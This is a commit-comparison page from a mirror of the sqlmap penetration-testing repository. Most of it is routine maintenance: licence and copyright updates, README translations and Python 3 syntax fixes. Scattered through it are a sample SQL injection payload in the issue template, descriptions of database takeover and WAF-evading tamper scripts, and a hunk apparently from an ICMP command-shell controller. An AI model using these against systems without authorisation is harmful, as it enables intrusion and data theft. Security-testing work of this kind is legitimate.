Mirror of https://github.com/sqlmapproject/sqlmap.git
Synced 2025-12-11 02:09:04 +00:00
Compare commits
557 Commits
.github/CONTRIBUTING.md (vendored, 1 change)
@@ -24,7 +24,6 @@ Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md)
 In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:
 
 * Each patch should make one logical change.
-* Wrap code to 76 columns when possible.
 * Avoid tabbing, use four blank spaces instead.
 * Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org).
 * Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.
.github/ISSUE_TEMPLATE.md (vendored, 2 changes)
@@ -19,7 +19,7 @@
 * Client OS (e.g. `Microsoft Windows 10`)
 * Program version (`python sqlmap.py --version` or `sqlmap --version` depending on installation):
 * Target DBMS (e.g. `Microsoft SQL Server`):
-* Detected WAF/IDS/IPS protection (e.g. `ModSecurity` or `unknown`):
+* Detected WAF/IPS protection (e.g. `ModSecurity` or `unknown`):
 * SQLi techniques found by sqlmap (e.g. `error-based` and `boolean-based blind`):
 * Results of manual target assessment (e.g. found that the payload `query=test' AND 4113 IN ((SELECT 'foobar'))-- qKLV` works):
 * Relevant console output (if any):
@@ -1,4 +1,7 @@
 language: python
+sudo: false
+git:
+  depth: 1
 python:
 - "2.6"
 - "2.7"
COMMITMENT (new file, 46 lines)
@@ -0,0 +1,46 @@
+GPL Cooperation Commitment
+Version 1.0
+
+Before filing or continuing to prosecute any legal proceeding or claim
+(other than a Defensive Action) arising from termination of a Covered
+License, we commit to extend to the person or entity ('you') accused
+of violating the Covered License the following provisions regarding
+cure and reinstatement, taken from GPL version 3. As used here, the
+term 'this License' refers to the specific Covered License being
+enforced.
+
+However, if you cease all violation of this License, then your
+license from a particular copyright holder is reinstated (a)
+provisionally, unless and until the copyright holder explicitly
+and finally terminates your license, and (b) permanently, if the
+copyright holder fails to notify you of the violation by some
+reasonable means prior to 60 days after the cessation.
+
+Moreover, your license from a particular copyright holder is
+reinstated permanently if the copyright holder notifies you of the
+violation by some reasonable means, this is the first time you
+have received notice of violation of this License (for any work)
+from that copyright holder, and you cure the violation prior to 30
+days after your receipt of the notice.
+
+We intend this Commitment to be irrevocable, and binding and
+enforceable against us and assignees of or successors to our
+copyrights.
+
+Definitions
+
+'Covered License' means the GNU General Public License, version 2
+(GPLv2), the GNU Lesser General Public License, version 2.1
+(LGPLv2.1), or the GNU Library General Public License, version 2
+(LGPLv2), all as published by the Free Software Foundation.
+
+'Defensive Action' means a legal proceeding or claim that We bring
+against you in response to a prior proceeding or claim initiated by
+you or your affiliate.
+
+'We' means each contributor to this repository as of the date of
+inclusion of this file, including subsidiaries of a corporate
+contributor.
+
+This work is available under a Creative Commons Attribution-ShareAlike
+4.0 International license (https://creativecommons.org/licenses/by-sa/4.0/).
LICENSE (2 changes)
@@ -1,7 +1,7 @@
 COPYING -- Describes the terms under which sqlmap is distributed. A copy
 of the GNU General Public License (GPL) is appended to this file.
 
-sqlmap is (C) 2006-2017 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
+sqlmap is (C) 2006-2019 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
 
 This program is free software; you may redistribute and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -1,10 +1,10 @@
 # sqlmap
 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
+[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
 
 sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
 
-**The sqlmap project is sponsored by [Netsparker Web Application Security Scanner](https://www.netsparker.com/?utm_source=github.com&utm_medium=referral&utm_content=sqlmap+repo&utm_campaign=generic+advert).**
+**The sqlmap project is sponsored by [Netsparker Web Application Security Scanner](https://www.netsparker.com/scan-website-security-issues/?utm_source=sqlmap.org&utm_medium=banner&utm_campaign=github).**
 
 Screenshots
 ----
@@ -64,5 +64,7 @@ Translations
 * [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
 * [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
 * [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
+* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md)
 * [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
 * [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
+* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md)
@@ -3,7 +3,7 @@
 * Implemented support for automatic decoding of page content through detected charset.
 * Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.).
 * Major improvements to program stabilization based on user reports.
-* Added new tampering scripts avoiding popular WAF/IPS/IDS mechanisms.
+* Added new tampering scripts avoiding popular WAF/IPS mechanisms.
 * Fixed major bug with DNS leaking in Tor mode.
 * Added wordlist compilation made of the most popular cracking dictionaries.
 * Implemented multi-processor hash cracking routine(s).
@@ -23,7 +23,7 @@
 * Added option `--csv-del` for manually setting delimiting character used in CSV output.
 * Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval.
 * Added switch `--smart` for conducting through tests only in case of positive heuristic(s).
-* Added switch `--check-waf` for checking of existence of WAF/IPS/IDS protection.
+* Added switch `--check-waf` for checking of existence of WAF/IPS protection.
 * Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables.
 * Added switch `--count` to count the number of entries for a specific table or all database(s) tables.
 * Major improvements to switches `--tables` and `--columns`.
@@ -55,7 +55,7 @@
 * Added option `--host` to set the HTTP Host header value.
 * Added switch `--hostname` to turn on retrieval of DBMS server hostname.
 * Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method.
-* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS/IDS protection.
+* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS protection.
 * Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized).
 * Added switch `--invalid-bignum` for usage of big numbers while invalidating values.
 * Added switch `--invalid-logical` for usage of logical operations while invalidating values.
@@ -78,7 +78,7 @@
 * Added option `--skip` to skip testing of given parameter(s).
 * Added switch `--skip-static` to skip testing parameters that not appear to be dynamic.
 * Added switch `--skip-urlencode` to skip URL encoding of payload data.
-* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS/IDS protection.
+* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS protection.
 * Added switch `--smart` to conduct thorough tests only if positive heuristic(s).
 * Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi).
 * Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt.
@@ -565,6 +565,9 @@ Efrain Torres, <et(at)metasploit.com>
 * for helping out to improve the Metasploit Framework sqlmap auxiliary module and for committing it on the Metasploit official subversion repository
 * for his great Metasploit WMAP Framework
 
+Jennifer Torres, <jtorresf42(at)gmail.com>
+* for contributing a tamper script luanginx.py
+
 Sandro Tosi, <matrixhasu(at)gmail.com>
 * for helping to create sqlmap Debian package correctly
 
@@ -597,6 +600,7 @@ Carlos Gabriel Vergara, <carlosgabrielvergara(at)gmail.com>
 
 Patrick Webster, <patrick(at)aushack.com>
 * for suggesting an enhancement
+* for donating to sqlmap development (from OSI.Security)
 
 Ed Williams, <ed.williams(at)ngssecure.com>
 * for suggesting a minor enhancement
doc/translations/README-ru-RUS.md (new file, 50 lines; Russian translation of the README, rendered here in English)
@@ -0,0 +1,50 @@
+# sqlmap
+
+[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
+
+sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many handy features for the professional penetration tester, and a broad range of scripts that ease working with databases, from gathering data from the database to accessing the underlying file system and executing commands on the operating system via an out-of-band connection.
+
+Screenshots
+----
+
+
+
+You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of the features in the wiki.
+
+Installation
+----
+
+You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or the latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository:
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform.
+
+Usage
+----
+
+To get a list of basic options and switches, use:
+
+    python sqlmap.py -h
+
+To get a list of all options and switches, use:
+
+    python sqlmap.py -hh
+
+You can find a sample run [here](https://asciinema.org/a/46601).
+To get an overview of sqlmap's capabilities, a list of supported features, and a description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Links
+----
+
+* Homepage: http://sqlmap.org
+* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* User's manual: https://github.com/sqlmapproject/sqlmap/wiki
+* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
doc/translations/README-uk-UA.md (new file, 50 lines; Ukrainian translation of the README, rendered here in English)
@@ -0,0 +1,50 @@
+# sqlmap
+
+[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
+
+sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many handy features for the professional penetration tester, and a broad range of scripts that ease working with databases, from database fingerprinting to accessing the underlying file system and executing commands on the operating system via an out-of-band connection.
+
+Screenshots
+----
+
+
+
+You can check out the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of the features in the wiki.
+
+Installation
+----
+
+You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or the latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository:
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform.
+
+Usage
+----
+
+To get a list of basic options and switches, use:
+
+    python sqlmap.py -h
+
+To get a list of all options and switches, use:
+
+    python sqlmap.py -hh
+
+You can find a sample run [here](https://asciinema.org/a/46601).
+To get an overview of sqlmap's capabilities, a list of supported features, and a description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Links
+----
+
+* Homepage: http://sqlmap.org
+* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* User's manual: https://github.com/sqlmapproject/sqlmap/wiki
+* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -3,7 +3,7 @@
 """
 beep.py - Make a beep sound
 
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -3,10 +3,12 @@
 """
 cloak.py - Simple file encryption/compression utility
 
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
+from __future__ import print_function
+
 import os
 import sys
 import zlib
@@ -38,7 +40,7 @@ def decloak(inputFile=None, data=None):
 try:
 data = zlib.decompress(hideAscii(data))
 except:
-print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile
+print('ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile)
 sys.exit(1)
 finally:
 f.close()
@@ -59,11 +61,11 @@ def main():
 if not args.inputFile:
 parser.error('Missing the input file, -h for help')
 
-except (OptionError, TypeError), e:
-parser.error(e)
+except (OptionError, TypeError) as ex:
+parser.error(ex)
 
 if not os.path.isfile(args.inputFile):
-print 'ERROR: the provided input file \'%s\' is non existent' % args.inputFile
+print('ERROR: the provided input file \'%s\' is non existent' % args.inputFile)
 sys.exit(1)
 
 if not args.decrypt:
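The cloak.py hunks above apply the same Python 2/3 compatibility idioms used throughout these utility scripts: importing print_function from __future__ and switching to the `except ... as` syntax. A minimal, self-contained sketch of that pattern (a hypothetical example script, not a file from the repository):

    #!/usr/bin/env python
    # Sketch of the 2/3-compatible idioms applied in the hunks above.

    from __future__ import print_function  # print() behaves the same on Python 2.6/2.7 and 3.x

    import sys

    def read_file(path):
        try:
            with open(path, "rb") as f:
                return f.read()
        except IOError as ex:  # "except ... as ex" parses on both Python 2 and 3
            print("ERROR: unable to read '%s' (%s)" % (path, ex))
            sys.exit(1)

    if __name__ == "__main__":
        if len(sys.argv) > 1:
            print("%d bytes read from '%s'" % (len(read_file(sys.argv[1])), sys.argv[1]))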
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -3,10 +3,12 @@
 """
 dbgtool.py - Portable executable to ASCII debug script converter
 
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
+from __future__ import print_function
+
 import os
 import sys
 import struct
@@ -19,7 +21,7 @@ def convert(inputFile):
 fileSize = fileStat.st_size
 
 if fileSize > 65280:
-print "ERROR: the provided input file '%s' is too big for debug.exe" % inputFile
+print("ERROR: the provided input file '%s' is too big for debug.exe" % inputFile)
 sys.exit(1)
 
 script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_"))
@@ -59,7 +61,7 @@ def convert(inputFile):
 
 def main(inputFile, outputFile):
 if not os.path.isfile(inputFile):
-print "ERROR: the provided input file '%s' is not a regular file" % inputFile
+print("ERROR: the provided input file '%s' is not a regular file" % inputFile)
 sys.exit(1)
 
 script = convert(inputFile)
@@ -70,7 +72,7 @@ def main(inputFile, outputFile):
 sys.stdout.write(script)
 sys.stdout.close()
 else:
-print script
+print(script)
 
 if __name__ == "__main__":
 usage = "%s -i <input file> [-o <output file>]" % sys.argv[0]
@@ -86,8 +88,8 @@ if __name__ == "__main__":
 if not args.inputFile:
 parser.error("Missing the input file, -h for help")
 
-except (OptionError, TypeError), e:
-parser.error(e)
+except (OptionError, TypeError) as ex:
+parser.error(ex)
 
 inputFile = args.inputFile
 outputFile = args.outputFile
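The 65280-byte guard in the dbgtool.py hunk above matches the classic DOS debug.exe limitation: debug.exe loads a file at offset 0x100 of a single 64 KB segment, so the largest file it can rebuild is 0x10000 - 0x100 = 0xFF00 bytes. A tiny hedged check expressing that arithmetic (helper name is illustrative only):

    import os

    MAX_DEBUG_EXE_SIZE = 0x10000 - 0x100  # 64 KB segment minus the 256 bytes below the 0x100 load offset
    assert MAX_DEBUG_EXE_SIZE == 65280

    def fits_in_debug_script(path):
        # Mirrors the fileSize > 65280 guard in convert() above.
        return os.stat(path).st_size <= MAX_DEBUG_EXE_SIZE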
@@ -80,7 +80,7 @@ def main(src, dst):
 cmd = ''
 
 # Wait for incoming replies
-if sock in select.select([ sock ], [], [])[0]:
+if sock in select.select([sock], [], [])[0]:
 buff = sock.recv(4096)
 
 if 0 == len(buff):
@@ -125,8 +125,12 @@ def main(src, dst):
 # Have the IP packet contain the ICMP packet (along with its payload)
 ip.contains(icmp)
 
-# Send it to the target host
-sock.sendto(ip.get_packet(), (dst, 0))
+try:
+# Send it to the target host
+sock.sendto(ip.get_packet(), (dst, 0))
+except socket.error as ex:
+sys.stderr.write("'%s'\n" % ex)
+sys.stderr.flush()
 
 if __name__ == '__main__':
 if len(sys.argv) < 3:
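The second hunk above wraps the raw-socket send in a try/except so that a single undeliverable ICMP packet is reported on stderr instead of aborting the whole send/receive loop. A minimal hedged sketch of the same pattern, using only the standard library (function name is illustrative):

    import socket
    import sys

    def send_best_effort(sock, payload, dst):
        # Report delivery failures without killing the surrounding loop,
        # mirroring the "except socket.error" handling added above.
        try:
            sock.sendto(payload, (dst, 0))
        except socket.error as ex:
            sys.stderr.write("'%s'\n" % ex)
            sys.stderr.flush()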
@@ -1,137 +0,0 @@
-#!/usr/bin/env python
-
-"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'LICENSE' for copying permission
-"""
-
-import codecs
-import os
-import re
-import urllib2
-import urlparse
-
-from xml.dom.minidom import Document
-
-# Path to the XML file with signatures
-MSSQL_XML = os.path.abspath("../../xml/banner/mssql.xml")
-
-# Url to update Microsoft SQL Server XML versions file from
-MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx"
-
-def updateMSSQLXML():
-if not os.path.exists(MSSQL_XML):
-errMsg = "[ERROR] file '%s' does not exist. Please run the script from its parent directory" % MSSQL_XML
-print errMsg
-return
-
-infoMsg = "[INFO] retrieving data from '%s'" % MSSQL_VERSIONS_URL
-print infoMsg
-
-try:
-req = urllib2.Request(MSSQL_VERSIONS_URL)
-f = urllib2.urlopen(req)
-mssqlVersionsHtmlString = f.read()
-f.close()
-except urllib2.URLError:
-__mssqlPath = urlparse.urlsplit(MSSQL_VERSIONS_URL)
-__mssqlHostname = __mssqlPath[1]
-
-warnMsg = "[WARNING] sqlmap was unable to connect to %s," % __mssqlHostname
-warnMsg += " check your Internet connection and retry"
-print warnMsg
-
-return
-
-releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I)
-releasesCount = len(releases)
-
-# Create the minidom document
-doc = Document()
-
-# Create the <root> base element
-root = doc.createElement("root")
-doc.appendChild(root)
-
-for index in xrange(0, releasesCount):
-release = releases[index]
-
-# Skip Microsoft SQL Server 6.5 because the HTML
-# table is in another format
-if release == "6.5":
-continue
-
-# Create the <signatures> base element
-signatures = doc.createElement("signatures")
-signatures.setAttribute("release", release)
-root.appendChild(signatures)
-
-startIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index])
-
-if index == releasesCount - 1:
-stopIdx = len(mssqlVersionsHtmlString)
-else:
-stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1])
-
-mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx]
-servicepackVersion = re.findall("</td><td>(7\.0|2000|2005|2008|2008 R2)*(.*?)</td><td.*?([\d\.]+)</td>[\r]*\n", mssqlVersionsReleaseString, re.I)
-
-for servicePack, version in servicepackVersion:
-if servicePack.startswith(" "):
-servicePack = servicePack[1:]
-if "/" in servicePack:
-servicePack = servicePack[:servicePack.index("/")]
-if "(" in servicePack:
-servicePack = servicePack[:servicePack.index("(")]
-if "-" in servicePack:
-servicePack = servicePack[:servicePack.index("-")]
-if "*" in servicePack:
-servicePack = servicePack[:servicePack.index("*")]
-if servicePack.startswith("+"):
-servicePack = "0%s" % servicePack
-
-servicePack = servicePack.replace("\t", " ")
-servicePack = servicePack.replace("No SP", "0")
-servicePack = servicePack.replace("RTM", "0")
-servicePack = servicePack.replace("TM", "0")
-servicePack = servicePack.replace("SP", "")
-servicePack = servicePack.replace("Service Pack", "")
-servicePack = servicePack.replace("<a href=\"http:", "")
-servicePack = servicePack.replace(" ", " ")
-servicePack = servicePack.replace("+ ", "+")
-servicePack = servicePack.replace(" +", "+")
-
-if servicePack.endswith(" "):
-servicePack = servicePack[:-1]
-
-if servicePack and version:
-# Create the main <card> element
-signature = doc.createElement("signature")
-signatures.appendChild(signature)
-
-# Create a <version> element
-versionElement = doc.createElement("version")
-signature.appendChild(versionElement)
-
-# Give the <version> elemenet some text
-versionText = doc.createTextNode(version)
-versionElement.appendChild(versionText)
-
-# Create a <servicepack> element
-servicepackElement = doc.createElement("servicepack")
-signature.appendChild(servicepackElement)
-
-# Give the <servicepack> elemenet some text
-servicepackText = doc.createTextNode(servicePack)
-servicepackElement.appendChild(servicepackText)
-
-# Save our newly created XML to the signatures file
-mssqlXml = codecs.open(MSSQL_XML, "w", "utf8")
-doc.writexml(writer=mssqlXml, addindent=" ", newl="\n")
-mssqlXml.close()
-
-infoMsg = "[INFO] done. retrieved data parsed and saved into '%s'" % MSSQL_XML
-print infoMsg
-
-if __name__ == "__main__":
-updateMSSQLXML()
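The removed updater scraped the sqlsecurity.com build table with regular expressions and then serialized the results with xml.dom.minidom. A condensed, hedged sketch of just the XML-building half (entry values here are made-up examples, and the helper name is illustrative):

    import codecs
    from xml.dom.minidom import Document

    def write_signatures(entries, path):
        # entries: iterable of (release, version, servicepack) tuples,
        # e.g. ("2005", "9.00.5000.00", "4") -- illustrative values only.
        doc = Document()
        root = doc.createElement("root")
        doc.appendChild(root)

        for release, version, servicepack in entries:
            signatures = doc.createElement("signatures")
            signatures.setAttribute("release", release)
            root.appendChild(signatures)

            signature = doc.createElement("signature")
            signatures.appendChild(signature)

            for tag, value in (("version", version), ("servicepack", servicepack)):
                element = doc.createElement(tag)
                element.appendChild(doc.createTextNode(value))
                signature.appendChild(element)

        with codecs.open(path, "w", "utf8") as output:
            doc.writexml(writer=output, addindent="    ", newl="\n")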
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -3,10 +3,12 @@
 """
 safe2bin.py - Simple safe(hex) to binary format converter
 
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
+from __future__ import print_function
+
 import binascii
 import re
 import string
@@ -108,11 +110,11 @@ def main():
 if not args.inputFile:
 parser.error('Missing the input file, -h for help')
 
-except (OptionError, TypeError), e:
-parser.error(e)
+except (OptionError, TypeError) as ex:
+parser.error(ex)
 
 if not os.path.isfile(args.inputFile):
-print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile
+print('ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile)
 sys.exit(1)
 
 f = open(args.inputFile, 'r')
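safe2bin.py converts a textual "safe" representation back into raw binary; the hunks above only modernize its print/except syntax. As a hedged illustration of the general idea (not the script's exact escaping rules), literal \xNN escapes can be folded back into the characters they name like this:

    import re

    def unescape_hex(text):
        # Turn literal "\xNN" sequences back into the characters they name,
        # e.g. r"foo\x0abar" -> "foo\nbar" (illustrative rule, not safe2bin's full format).
        return re.sub(r"\\x([0-9a-fA-F]{2})", lambda match: chr(int(match.group(1), 16)), text)

    assert unescape_hex(r"foo\x0abar") == "foo\nbar"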
@@ -1,10 +1,12 @@
 #!/usr/bin/env python
 
-# Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 
 # Removes duplicate entries in wordlist like files
 
+from __future__ import print_function
+
 import sys
 
 if len(sys.argv) > 0:
@@ -17,7 +19,7 @@ if len(sys.argv) > 0:
 str.encode(item)
 if item in items:
 if item:
-print item
+print(item)
 else:
 items.append(item)
 except:
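The de-duplication script above tracks previously seen entries in a plain list, so each membership test is linear in the number of unique lines. A hedged alternative sketch that keeps the first occurrence of every line while using a set for constant-time lookups (an illustration, not the repository's exact logic):

    from __future__ import print_function

    import sys

    def print_unique_lines(stream):
        seen = set()
        for line in stream:
            item = line.rstrip("\r\n")
            if item and item not in seen:
                seen.add(item)
                print(item)

    if __name__ == "__main__":
        with open(sys.argv[1]) as wordlist:
            print_unique_lines(wordlist)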
extra/shutils/newlines.py (new file, 32 lines)
@@ -0,0 +1,32 @@
+#! /usr/bin/env python
+
+# Runs pylint on all python scripts found in a directory tree
+# Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html
+
+from __future__ import print_function
+
+import os
+import sys
+
+def check(filepath):
+if filepath.endswith(".py"):
+content = open(filepath, "rb").read()
+
+if "\n\n\n" in content:
+index = content.find("\n\n\n")
+print(filepath, repr(content[index - 30:index + 30]))
+
+if __name__ == "__main__":
+try:
+BASE_DIRECTORY = sys.argv[1]
+except IndexError:
+print("no directory specified, defaulting to current working directory")
+BASE_DIRECTORY = os.getcwd()
+
+print("looking for *.py scripts in subdirectories of '%s'" % BASE_DIRECTORY)
+for root, dirs, files in os.walk(BASE_DIRECTORY):
+if any(_ in root for _ in ("extra", "thirdparty")):
+continue
+for name in files:
+filepath = os.path.join(root, name)
+check(filepath)
@@ -1,7 +0,0 @@
-#!/bin/bash
-
-# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
-# See the file 'LICENSE' for copying permission
-
-# Runs pep8 on all python files (prerequisite: apt-get install pep8)
-find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \;
@@ -1,5 +1,15 @@
 #!/bin/bash
 
+: '
+cat > .git/hooks/post-commit << EOF
+#!/bin/bash
+
+source ./extra/shutils/postcommit-hook.sh
+EOF
+
+chmod +x .git/hooks/post-commit
+'
+
 SETTINGS="../../lib/core/settings.py"
 
 declare -x SCRIPTPATH="${0}"
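The commented block added at the top of the hook documents how to wire it into a local clone: Git only runs executables placed under .git/hooks, so a thin wrapper there sources the tracked script. A hedged Python equivalent of that bootstrap step (paths taken from the comment above; function name is illustrative):

    import os
    import stat

    def install_post_commit_hook(repo_root="."):
        # Create .git/hooks/post-commit as a wrapper that sources the tracked script,
        # reproducing the shell snippet shown in the comment block above.
        hook_path = os.path.join(repo_root, ".git", "hooks", "post-commit")
        with open(hook_path, "w") as hook:
            hook.write("#!/bin/bash\n\nsource ./extra/shutils/postcommit-hook.sh\n")
        os.chmod(hook_path, os.stat(hook_path).st_mode | stat.S_IEXEC)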
@@ -1,5 +1,15 @@
 #!/bin/bash
 
+: '
+cat > .git/hooks/pre-commit << EOF
+#!/bin/bash
+
+source ./extra/shutils/precommit-hook.sh
+EOF
+
+chmod +x .git/hooks/pre-commit
+'
+
 PROJECT="../../"
 SETTINGS="../../lib/core/settings.py"
 CHECKSUM="../../txt/checksum.md5"
@@ -16,7 +26,7 @@ if [ -f $SETTINGS_FULLPATH ]
 then
 LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"')
 declare -a LINE
